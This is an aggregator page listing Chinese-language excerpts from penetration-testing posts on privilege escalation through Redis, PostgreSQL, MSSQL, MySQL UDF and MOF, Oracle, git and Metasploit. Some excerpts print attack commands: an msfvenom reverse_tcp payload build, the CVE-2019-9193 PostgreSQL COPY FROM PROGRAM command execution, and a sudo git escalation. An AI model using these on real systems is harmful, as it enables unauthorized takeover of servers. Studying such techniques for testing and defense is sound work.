ICode9

精准搜索请尝试: 精确搜索
  • 61:权限提升-Redis&Postgre&令牌窃取&进程注入;令牌窃取相当于窃取session-token;进程注入提权就是利用system权限的进程“附身”2022-02-05 20:35:09

    61:权限提升-Redis&Postgre&令牌窃取&进程注入   本课内容 案例1:Redis数据库权限提升-计划任务 1、利用计划任务执行命令反弹shell 2、写入ssh-keygen公钥然后使用私钥登陆 3、权限较低往web物理路径写webshell 4、修复方案 案例2:PostgreSQL数据库权限提升-漏洞 1、Postgre

  • oracle提权执行命令工具oracleShell v0.12022-02-05 19:35:21

    from:https://www.cnblogs.com/rebeyond/p/7928887.html   帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的。想起来自己之前写过一个oracle的连接工具,拿出来分享下。工具没有用

  • MSSQL提权之xp_cmdshell、SP_OACreate2022-02-05 18:35:03

    MSSQL提权之xp_cmdshell   阅读目录(Content) 0x01 前提 0x02 xp_cmdshell 0x03 提权 回到顶部(go to top) 一、简介        xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 三、SQL Server 2005中的xp_cmdshel

  • MySQL提权之启动项提权——开机启动的程序,那时候启动的程序权限都是system2022-02-05 17:32:51

    MySQL提权之启动项提权 原理:windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。   关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到  C:\Documents and S

  • Mysql UDF提权方法2022-02-05 13:02:44

    Mysql UDF提权方法    0x01 UDF# UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。 0x02 windows下udf提权的条件# 如果mysql版本大于5.1,ud

  • (墨者学院)-主机溢出提权漏洞分析2022-02-04 22:35:07

    (墨者学院)-主机溢出提权漏洞分析 原文见:https://blog.csdn.net/qq_52074678/article/details/121851873 需要的小知识大纲1、掌握文件上传的技巧;2、掌握IIS中间件存在的畸形解析漏洞;3、了解Windows系统CMD命令执行;4、了解查看操作系统安全补丁情况;5、了解Windows操作系统的文件权限

  • webshell拿到网站权限后使用MSF提权--利用高权限进程提权,msf操作过程和永恒之蓝类似2022-02-04 20:34:23

    原文:https://www.cnblogs.com/hkleak/p/5770300.html 在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5

  • 2022-渗透测试-git提权(Linux)2022-02-02 23:30:27

    目录 1.什么是提权 2.git提权命令 3.git的使用 1.什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。利用漏洞的最终目的是获取被测系统的最高权限,即Windows中管理员账户的权限,或Linux中root账户的权限。 2.git提权命令 sudo git help config !

  • openssl passwd 手动生成密码——passwd提权2022-02-02 14:34:33

    参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html 引言: 在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的

  • mysql udf反弹端口提权2022-02-01 11:33:29

    mysql udf反弹端口提权 本篇文章只是记录一下 udf.dll提权的另一种方法,不涉及udf.dll提权原理的详细讲解。 详细的原理讲解请移步博主的这篇文章:https://www.cnblogs.com/02SWD/p/15858250.html 本篇文章所使用的 udf.dll(该udf.dll只适用于32位的mysql数据库):链接:https://pan.baid

  • Windows 11 UAC/管理员权限授权/提权 窗口极慢2022-02-01 01:02:08

    临时解决方案 让UAC不变暗,等微软修复再改回来 ^ref

  • mysql udf提权2022-01-31 14:35:46

    mysql udf提权 本次测试环境 win2008 R2 Enterprise phpstudy2018 运行的版本是:php-5.4.45 + apache mysql版本:version_comment | MySQL Community Server (GPL) version_compile_machine | AMD64 version_compile_os | Win32 win2008 中搭建 Discuz_X1.5_SC_UTF

  • mysql mof提权2022-01-31 14:03:36

    mysql mof提权 1. 前置知识 mysql中的secure_file_priv参数 使用: 当 secure_file_priv=NULL 时,是不允许mysql导出文件的 当 secure_file_priv=xxx 时,是只允许mysql将文件导出到xxx目录下的 当 secure_file_priv= 时,mysql可以将文件导出到任意目录下 该参数在 my.ini 文件中。如

  • Linux学习第八节课2022-01-29 19:34:35

    一、sudo配置 1、 第100行开始 用户名 登录限制=(提权登录名) 许可命令 2、sudo命令参数 -l查看可提权用户、-u指定用户 二、文件系统 1、交互VFS文件系统操作 2、文件系统的改进对应于满足下一阶段的需求

  • postgresql提权2022-01-28 23:34:14

    (CVE-2019-9193) CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令: drop table if exists cmd_exec; create table cmd_exec(cmd_output text); copy cmd_exec from program 'id'; select * from cmd_exec; dro

  • DC-62022-01-27 12:32:30

    DC-6 目录信息收集用户爆破命令执行反弹shell提权WWW-DATA到grahamgraham到jensjens到root 信息收集 先把wordy加到host中 nmap -T4 -A -p 1-65535 192.168.211.138 又是wordpress,扫一下 wpscan --url http://wordy/ --enumerate u admin sarah graham mark jens 用户爆破 hydra

  • 记一次PowerShell配合Metersploit的艰难提权2022-01-24 16:37:04

    0x01 环境准备kali(模拟公网攻击机) Windows2008(靶机,装有360、火绒、安全狗、D盾)Powersploit(PowerShell攻击框架)https://github.com/PowerShellMafia/PowerSploit0x02 尝试落地payload首先msfvenom生成exe后门程序msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192

  • Vulnhub靶机:AI-Web-1.02022-01-20 22:33:19

    1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试

  • DC-22022-01-19 20:32:47

    DC-2 目录DC-2信息收集web打点生成字典爆破文件上传ssh连接rbash逃逸git提权总结 发现靶机iparp-scan -l 访问发现找不到host,这里先添加host web端成功访问,开始渗透之路 信息收集 开了一个80。7744端口,wordpress组件 ,ssh改到7744端口上了,那就直接考虑对wordpress进行渗透吧 w

  • Linux提权-脏牛内核漏洞2022-01-19 14:58:34

    靶机环境下载地址https://www.vulnhub.com/entry/lampiao-1,249/ 环境:攻击机:kali虚拟机192.168.76.132 靶机:ip未知 过程:探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权 靶机密码也没有,ip也没有 探针目标 靶机和kali在同网段,所以kali用nmap扫描同网段存活主机和其端口

  • phpmyadmin getshell到提权2022-01-11 09:34:45

    环境准备:win7,phpstudy(包含phpmyadmin,可用旧版) 开始攻击: 通过弱口令,信息收集,爆破等方式获知phpmyadmin的账号密码是root root 开始登录目标机器上的phpmyadmin 2.检测MySQL全局变量(generallog、generallog file)的值。 在SQL处输入sql语句: SHOW VARIABLES LIKE ‘general%’ 看

  • linux tee命令 配合root权限不可写的 定时任务文件提权2022-01-05 10:01:16

    前言 Linux tee命令用于读取标准输入的数据,并将其内容输出成文件。 tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。 语法 tee [-ai][–help][–version][文件…] 参数: -a或–append  附加到既有文件的后面,而非覆盖它. -i或–ignore-interrupts

  • Vulnhub-Narak靶场2021-12-29 21:01:33

    本篇主要对Vulnhub中Narak靶场进行练习: 通过对此靶场的练习,熟练掌握初步信息收集、目录发现、MSF利用、NC反弹、口令爆破、提权等知识;全方位细致演示,笔记只为勉励自己,本人只是一个努力上山的人,若有错处,大佬勿喷!!! 靶机下载地址: https://www.vulnhub.com/entry/ha-narak,569/

  • 渗透测试提权靶场Billu box 刷题记录2021-12-20 23:00:56

    PS:最近项目实在太忙了没时间出文章,拿以前的笔记水一篇吧。 kali渗透综合靶机–Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 信息收集 可利用工具如下 Netdiscover(主机ip收集) Masscan(端口收集) Nmap(服务加端口) netdiscover -i eth0 -r 192.

  • Vulnhub 靶场 HMS?: 12021-12-19 13:01:00

    前期准备: 靶机地址:https://www.vulnhub.com/entry/hms-1,728/ kali攻击机ip:192.168.11.129 靶机ip:192.168.11.200 一、信息收集 1.使用nmap对目标靶机进行扫描 发现开放了21、22和7080端口。 2. 21端口 里面什么也没有。 3. 7080端口 看到一个表单,用弱密码检测了一番没什么结果

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有